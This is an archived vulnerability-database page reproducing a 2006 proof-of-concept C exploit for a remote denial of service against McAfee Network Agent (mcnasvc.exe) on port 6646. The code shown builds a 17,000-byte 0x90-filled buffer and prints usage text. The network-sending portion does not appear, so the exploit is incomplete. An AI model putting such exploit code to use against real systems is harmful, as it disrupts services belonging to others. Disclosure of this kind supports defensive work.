Lucene search

K

mcnasvc.exe-dos.txt

🗓️ 17 Oct 2006 00:00:00Reported by JAAScoisType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 28 Views

Mcafee Network Agent remote DoS vulnerability in mcnasvc.exe ver1.0.178.

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`/////////////////////////////////////////////////////  
// Mcafee Network Agent (mcnasvc.exe) Remote DoS  
// By JAAScois [ http://www.jaascois.com ]  
// Teston [ mcnasvc.exe ver1.0.178.0 ]  
// Path [C:\Program Files\Common Files\McAfee\MNA]  
// Port: [6646]  
/////////////////////////////////////////////////////  
#include <stdio.h>  
#include <winsock2.h>  
#pragma comment(lib, "ws2_32.lib")  
  
int main (int argc, char *argv[]){  
  
struct sockaddr_in tcp;  
static SOCKET sock;  
int ii=0;  
unsigned char buf[17000];  
WSADATA wsaData;  
  
// packet  
for(ii=0;ii<17000;ii++){  
buf[ii]=0x90;  
}  
  
printf("[>>] Mcafee Network Agent (mcnasvc.exe ver 1.0.178.0)  
Remote DoS  
\n");  
printf("[>>] By JAAScois [ http://www.jaascois.com ]  
\n");  
printf("[>>] +\n");  
printf("[>>] +\n");  
  
if(argc<2){  
printf("[>>] Usage:%s 190.160.24.1\n",argv[0]);  
return 1;  
}  
  
  
  
securitydot.net - 2006-10-12  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
17 Oct 2006 00:00Current
7.4High risk
Vulners AI Score7.4
28
.json
Report